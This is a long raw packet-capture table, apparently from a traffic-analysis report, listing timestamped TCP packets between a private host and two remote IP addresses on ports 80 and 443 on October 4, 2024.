                                                                                                                                            Oct 4, 2024 11:56:04.347238064 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.347239017 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.347268105 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.347275972 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.347280979 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.347301006 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.347315073 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.347335100 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.347349882 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.347367048 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.347382069 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.347413063 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.347430944 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.347464085 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.347486019 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.347496986 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.347528934 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.347537994 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.347537994 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.347558975 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.347562075 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.347564936 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.347594023 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.347604036 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.347628117 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.347636938 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.347661972 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.347671032 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.347698927 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.347704887 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.347743034 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.347930908 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.347964048 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.347982883 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.347995043 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.348006964 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.348028898 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.348041058 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.348061085 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.348072052 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.348093033 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.348104000 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.348125935 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.348135948 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.348157883 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.348169088 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.348190069 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.348200083 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.348222971 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.348232031 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.348254919 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.348267078 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.348287106 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.348295927 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.348320007 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.348326921 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.348362923 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.348841906 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.348874092 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.348896027 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.348906040 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.348913908 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.348938942 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.348948956 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.348972082 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.348982096 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.349006891 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.349018097 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.349040031 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.349050045 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.349071980 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.349081993 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.349106073 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.349114895 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.349138021 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.349157095 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.349169970 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.349178076 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.349201918 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.349220991 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.349232912 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.349242926 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.349268913 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.349277020 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.349311113 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.349852085 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.349885941 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.349905968 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.349917889 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.349927902 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.349951982 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.349958897 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.349983931 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.349993944 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.350018024 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.350028038 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.350050926 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.350059986 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.350084066 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.350091934 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.350116014 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.350121975 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.350148916 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.350159883 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.350179911 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.350186110 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.350214958 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.350224972 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.350265026 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.352910042 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.352969885 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.353081942 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.353115082 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.353144884 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.353148937 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.353162050 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.353182077 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.353198051 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.353224039 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.353230000 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.353261948 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.353271008 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.353293896 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.353306055 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.353327036 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.353347063 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.353358984 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.353364944 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.353390932 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.353424072 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.353667021 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.353698969 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.353730917 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.353761911 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.353792906 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.353825092 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.353857994 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.353988886 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.354021072 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.354046106 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.354053974 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.354114056 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.354155064 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.354204893 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.354227066 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.354235888 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.354269028 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.354275942 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.354301929 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.354324102 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.354332924 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.354358912 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.354366064 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.354397058 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.354398966 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.354422092 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.354430914 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.354439974 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.354461908 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.354481936 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.354495049 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.354510069 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.354542971 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.354659081 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.354780912 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.354829073 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.354830027 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.354861975 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.354881048 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.354895115 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.354913950 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.354926109 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.354940891 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.354969978 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.354979992 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.355003119 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.355020046 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.355035067 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.355057955 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.355067015 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.355078936 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.355098009 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.355110884 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.355129957 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.355143070 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.355160952 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.355180025 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.355191946 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.355207920 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.355223894 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.355237007 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.355257988 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.355269909 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.355304956 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.355331898 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.355545998 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.355613947 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.355678082 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.355724096 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.355756044 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.355787039 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.355818033 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.355849028 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.355880022 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.355895042 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.355911016 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.355916977 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.355936050 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.355942965 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.355957031 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.355974913 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.355993986 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.356008053 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.356014013 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.356039047 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.356057882 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.356070995 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.356090069 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.356101990 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.356110096 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.356134892 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:04.356152058 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.356183052 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:04.356241941 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:08.787167072 CEST8049169192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:08.787235975 CEST4916980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:09.866889000 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:09.866982937 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:09.867053032 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:09.890140057 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:09.890173912 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.345879078 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.346004009 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.373548031 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.373627901 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.373898029 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.471457005 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.519398928 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.632795095 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.633105993 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.633157969 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.633208036 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.633264065 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.633330107 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.633343935 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.633579969 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.633599997 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.633630037 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.633644104 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.633697987 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.634227037 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.634294987 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.634346962 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.634360075 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.636153936 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.636238098 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.637964964 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.720602036 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.720633984 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.720674992 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.720683098 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.720730066 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.720766068 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.721028090 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.721056938 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.721086025 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.721100092 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.721152067 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.721165895 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.721210957 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.721265078 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.721266985 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.721276999 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.721322060 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.721544981 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.722105980 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.722156048 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.722171068 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.722183943 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.722234011 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.722244978 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.722313881 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.722342014 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.722351074 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.722362995 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.722409964 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.723063946 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.723215103 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.723262072 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.723274946 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.723412037 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.723488092 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.723490953 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.723503113 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.723543882 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.807431936 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.807440996 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.807506084 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:10.807566881 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:10.807566881 CEST49170443192.168.2.22185.199.111.133
